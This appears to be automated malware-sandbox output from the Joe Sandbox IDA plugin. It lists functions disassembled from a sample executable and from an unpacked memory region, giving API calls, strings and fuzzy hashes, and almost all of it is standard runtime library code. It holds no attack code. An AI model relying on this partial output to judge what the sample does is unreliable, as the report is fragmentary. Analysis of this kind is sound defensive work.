SetLastError.KERNEL32(00000000,?,02355195,02353D59,0233B7BC,00462014,?,00000000,0044B3E8,000000FF,?,02322691,?,?), ref: 02355225

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
Instruction ID: 9a292f34cf2996c0764a74f95700672e91eb93664b856336db5b586d02a19702
Opcode Fuzzy Hash: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
Instruction Fuzzy Hash: D9012432619B31AEE62027B47C85E1A2A9AEB007787600339FE2C454F1FF919801CA84

Function 00434F37 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00434F2E,00433AF2,0041B555,53A352EA,?,00000000,0044B3E8,000000FF,?,0040242A,?,?), ref: 00434F45
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00434F53
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00434F6C
SetLastError.KERNEL32(00000000,?,00434F2E,00433AF2,0041B555,53A352EA,?,00000000,0044B3E8,000000FF,?,0040242A,?,?), ref: 00434FBE

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
Instruction ID: 15ffdb8e0af02f49516ecf1b0bf4576f7fedfc7d9ef3b4932012a3e501010d40
Opcode Fuzzy Hash: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
Instruction Fuzzy Hash: 0701283250C7227DAA2027757C4599BAA86EB4A3B8F24223FF724402E1EF9D5C01968D

Function 0233FE82 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0233FE90
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0233FE96
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0233FEC3
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0233FECD
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0233FEDF
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0233FEF5

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
Instruction ID: 0c3260ceddc68bae5be52be26103cf45e24daa5dda2ef07b5a434aaf39067e57
Opcode Fuzzy Hash: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
Instruction Fuzzy Hash: 8701D03A9402156BD711BB75EC44FAF37FDEF41B52B940425F809E2852DB38D6048B64

Function 0041FC1B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC29
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC2F
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC5C
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC66
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC78
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FC8E

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
Instruction ID: 03917569e0bc54ee2298924e5aad4e28c925d034798c30f2cdbb860cd2e6707d
Opcode Fuzzy Hash: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
Instruction Fuzzy Hash: 9F01DD3564020567D700AB66EC49BEB7768BF41712B54043BFC01D1152EB2CE549979D

Function 02362959 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 023629C3
_free.LIBCMT ref: 023629B1

Part of subcall function 0235B05C: HeapFree.KERNEL32(00000000,00000000,?,0235F334,?,00000000,?,?,?,0235F35B,?,00000007,?,?,0235F75D,?), ref: 0235B072
Part of subcall function 0235B05C: GetLastError.KERNEL32(?,?,0235F334,?,00000000,?,?,?,0235F35B,?,00000007,?,?,0235F75D,?,?), ref: 0235B084

_free.LIBCMT ref: 02362B7D

Strings

XgE, xrefs: 02362AE0
XgE, xrefs: 0236296C, 02362972

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: XgE$XgE
API String ID: 2155170405-1765908331
Opcode ID: c6433087ed30f2a2da2807838542e42bb6de4ad70922db091af99d7f7348fe1d
Instruction ID: 5919d1f5953c3bbaa3efcc92e398b53d4cbc47045e49a2ffe85a2680890b9edd
Opcode Fuzzy Hash: c6433087ed30f2a2da2807838542e42bb6de4ad70922db091af99d7f7348fe1d
Instruction Fuzzy Hash: 2851F57190021AABDB30EF64CC489BF77BDEF44314B16826ADC14A7294EBB08A41CB55

Function 0040DBE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

list too long, xrefs: 0040E09D

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: mtx_do_lock
String ID: list too long
API String ID: 1389037287-1124181908
Opcode ID: e8db10ea1e9f31c1c4c8cd784e01dfd0d2ddfc129ac8cf217fbe486e9ba11e96
Instruction ID: 0007737cba0ef289931fff910482b9d26868eafb82600a80664d17b7d07a3ec6
Opcode Fuzzy Hash: e8db10ea1e9f31c1c4c8cd784e01dfd0d2ddfc129ac8cf217fbe486e9ba11e96
Instruction Fuzzy Hash: F951CA71D04718ABDB10DF65CC8AB9AB3B8EF14714F1041ABF80DA7281E778A985CF59

Function 00434E1A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00434E6D
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00434E86
PMDtoOffset.LIBCMT ref: 00434EAC

Strings

Bad dynamic_cast!, xrefs: 00434EEE

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 76ec6d7001f37febc2ab6482f7c516d661d45f5fc475c9f7c43be269abc4c233
Instruction ID: 954d36f46f260efd2cd9394cd3d8c23cf35357d38ada446349ce258e6175ccbf
Opcode Fuzzy Hash: 76ec6d7001f37febc2ab6482f7c516d661d45f5fc475c9f7c43be269abc4c233
Instruction Fuzzy Hash: 32210772600205ABCB14DFA4D906AEF77A4FBCC724F10511FF91093680D73DF9008699

Function 0043182A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431885
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004318A4
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004318EB

Strings

pContext, xrefs: 0043189C

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1284976207-2046700901
Opcode ID: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
Instruction ID: d01a77f2ab9abe46547ca181dc4035302de0eae64105b64324a031690df06c10
Opcode Fuzzy Hash: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
Instruction Fuzzy Hash: 3421EA35B006159BCB19B765D895ABD73A5BF98338F04112BE411872E1CB6CAC428A9D

Function 0235E24A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\p3aYwXKO5T.exe, xrefs: 0235E24F

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\p3aYwXKO5T.exe
API String ID: 0-1323479745
Opcode ID: 83d649548dc4756340e3f4fa4cdfd0894265a7358bbde176a04f29cefd39949e
Instruction ID: e30dd3dad8fd4f5a1c6674b8513bc07b58e73e1f2511ad4d2e03caa4c6505cf7
Opcode Fuzzy Hash: 83d649548dc4756340e3f4fa4cdfd0894265a7358bbde176a04f29cefd39949e
Instruction Fuzzy Hash: C82192B1604625BFDB20AF61DC84E6AB7AEEF003657004524ED6D96550EB31EE50CBA0

Function 02349EFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 02349F03
std::bad_exception::bad_exception.LIBCMT ref: 02349F65
Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 02349FA7
std::bad_exception::bad_exception.LIBCMT ref: 02349FD1

Strings

8[F, xrefs: 02349F62, 02349F6F

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_ResolveSchedulerValues
String ID: 8[F
API String ID: 3836581985-331943168
Opcode ID: a4d644558bc095dc33be146fbd05eccc5a98fec7c23d9a48cae62212641850da
Instruction ID: 826afbbd26b7e65fbfc252077482d55b0228f185d577b2a3182927b609e051a1
Opcode Fuzzy Hash: a4d644558bc095dc33be146fbd05eccc5a98fec7c23d9a48cae62212641850da
Instruction Fuzzy Hash: 2221CF72940208AFDB25EF64D884A9EB7F5EF04311B1041AAE405AB291DF70BE46CF55

Function 0043727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 004372BE

Strings

.cmd, xrefs: 004372DC
.bat, xrefs: 004372ED
.exe, xrefs: 004372CB
.com, xrefs: 004372FE

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: eebd850b759d80cb09b7359ab37ad9482216c276737184da2b80f0523ace37d9
Instruction ID: 2fe954d65b4b50834951edb994104e0446c73801206968c056bf44c713a15be5
Opcode Fuzzy Hash: eebd850b759d80cb09b7359ab37ad9482216c276737184da2b80f0523ace37d9
Instruction Fuzzy Hash: 8D01086760861635663520199E0276713888BCABB8F25202FFDA4F73C1EF8CDD42A1EC

Function 00424EA2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00424F01
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00424F24
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00424F66

Strings

count, xrefs: 00424EBA
ppVirtualProcessorRoots, xrefs: 00424F1C

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 18808576-3650809737
Opcode ID: 0f050f97b8179aa4ac2a16646d21eb55e2bc560f4bbb76bd7718e5c12f5aa014
Instruction ID: 0fe100e528eb00baa15785fa13c2d5db46de6353967fcf2c4de188508199a33a
Opcode Fuzzy Hash: 0f050f97b8179aa4ac2a16646d21eb55e2bc560f4bbb76bd7718e5c12f5aa014
Instruction Fuzzy Hash: 43210034B00224EFCB04EF99D881EAD73A0FF88315F40406FE40697692CB74AE01CB58

Function 0235A8D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,02356BB1,?,?,?,?,023578C8,?), ref: 0235A8DD
_free.LIBCMT ref: 0235A93A
_free.LIBCMT ref: 0235A970
SetLastError.KERNEL32(00000000,00462170,000000FF,?,?,02356BB1,?,?,?,?,023578C8,?), ref: 0235A97B

Strings

x!F, xrefs: 0235A963

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
Instruction ID: 382133c6bad7426e5072b9aec500532679ee911c07c30dd75537c9386339b8f3
Opcode Fuzzy Hash: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
Instruction Fuzzy Hash: 1211E032204639BED63127749C84E7B517BBBC1779B260335FE1C921E0EFA28C056516

Function 0043A671 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0043694A,?,?,?,?,00437661,?), ref: 0043A676
_free.LIBCMT ref: 0043A6D3
_free.LIBCMT ref: 0043A709
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,0043694A,?,?,?,?,00437661,?), ref: 0043A714

Strings

x!F, xrefs: 0043A6FC

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
Instruction ID: 8cce909c9ac14f6c448446a217854be9d18c12721b99b88a770a56678c5f8ba9
Opcode Fuzzy Hash: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
Instruction Fuzzy Hash: 2511AB312447007A961166766C86A2B215AD7D937DF24213FF3A4462D2EEAD8C32515F

Function 0235AA2F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,02357862,023224AE), ref: 0235AA34
_free.LIBCMT ref: 0235AA91
_free.LIBCMT ref: 0235AAC7
SetLastError.KERNEL32(00000000,00462170,000000FF,?,02357862,023224AE), ref: 0235AAD2

Strings

x!F, xrefs: 0235AABA

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
Instruction ID: 4ec93ead56b5b0bf91ac1dafb273e0a5dde2006edf4cb8ac8b134f67604a7602
Opcode Fuzzy Hash: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
Instruction Fuzzy Hash: 9F11A931204721BEDA2167759D84E7A22ABABC1779B150335FE1C961E0EBA28C055915

Function 0043A7C8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,004375FB,00402247), ref: 0043A7CD
_free.LIBCMT ref: 0043A82A
_free.LIBCMT ref: 0043A860
SetLastError.KERNEL32(00000000,00000008,000000FF,?,004375FB,00402247), ref: 0043A86B

Strings

x!F, xrefs: 0043A853

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
Instruction ID: 43a0ef826740dec3b5b6cec3c960c44763b9b2bf66f2e005ed7dcd0d28945869
Opcode Fuzzy Hash: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
Instruction Fuzzy Hash: 0A1106312847003A961132765CC5E6B221AEBC977DF24223BF764822D2EFAECC23415F

Function 00435FB7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00436007

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
Instruction ID: e982735470ecda22ca74b33b30026038f59a5160edbe4d0761f7899da1883318
Opcode Fuzzy Hash: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
Instruction Fuzzy Hash: 72110F35901726BBC736CB68DC45A1F37749F097A1F325523ED01A7391D638DD008AE8

Function 023522FE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 0235231E
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0235232F
StructuredWorkStealingQueue.LIBCMT ref: 02352365
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 02352376

Strings

e, xrefs: 02352340

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 0d2225fe2c8ab7a3505318842e7243dca44ca0cc174a3b82b5b7bb2bdc31bc06
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: A7117331101125DBDB55DE69C840E6F77A9AF02354B18C5AAEC0EDF212DB71EA05CFA1

Function 00432097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 004320B7
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004320C8
StructuredWorkStealingQueue.LIBCMT ref: 004320FE
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043210F

Strings

e, xrefs: 004320D9

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 1ff5ec0336f97ae43b1f0b8f375a3bc5f2b05840f56227257267f5d03aa7fa4d
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 9411C131200104ABDF45DE69CB8166B73A4AF0A328F14D05BFD068F242DBF9D905CB99

Function 0232ABC7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 0232ABCA
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0232ABE8
GetLastError.KERNEL32 ref: 0232ABF0
GetLastError.KERNEL32 ref: 0232AC01

Strings

T2F, xrefs: 0232ABD7

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateMutexSleep
String ID: T2F
API String ID: 3645482037-3862687658
Opcode ID: 187082659592547e38ccbb39052786932d1335d10d1d45dc72119e21490735fa
Instruction ID: 122795bcb41b332f3594ba59b40467e84d4ed024ca5a7853d7f85074a2e9beeb
Opcode Fuzzy Hash: 187082659592547e38ccbb39052786932d1335d10d1d45dc72119e21490735fa
Instruction Fuzzy Hash: 0F01F431640310EBE7109F68FC08F5A7775E740B22F600A35F515D31D0DB789948CB59

Function 0043656D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00436562,?,?,0043652A,?,?,?), ref: 00436582
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00436595
FreeLibrary.KERNEL32(00000000,?,?,00436562,?,?,0043652A,?,?,?), ref: 004365B8

Strings

CorExitProcess, xrefs: 0043658D
mscoree.dll, xrefs: 0043657B

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
Instruction ID: dbc2b550f678300173dffafd29bb25114a02185772f501870b49608a3602ef38
Opcode Fuzzy Hash: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
Instruction Fuzzy Hash: C4F01235941319FBDB129B50ED0EB9E7A79EB04757F154072F805A22A1CB78CF04DB98

Function 0041D199 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,0041D136,00000064), ref: 0041D1BC
RtlLeaveCriticalSection.NTDLL(00465750), ref: 0041D1C6
WaitForSingleObjectEx.KERNEL32(00468680,00000000,?,0041D136,00000064,?,75570F00,?,004075ED,00468680), ref: 0041D1D7
RtlEnterCriticalSection.NTDLL(00465750), ref: 0041D1DE

Strings

PWF, xrefs: 0041D1C0

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID: PWF
API String ID: 3269011525-4189640852
Opcode ID: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
Instruction ID: 46656ffccb6e8e596dcc74b2c483e7fba3308dd0c831886d2789c24014a254a2
Opcode Fuzzy Hash: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
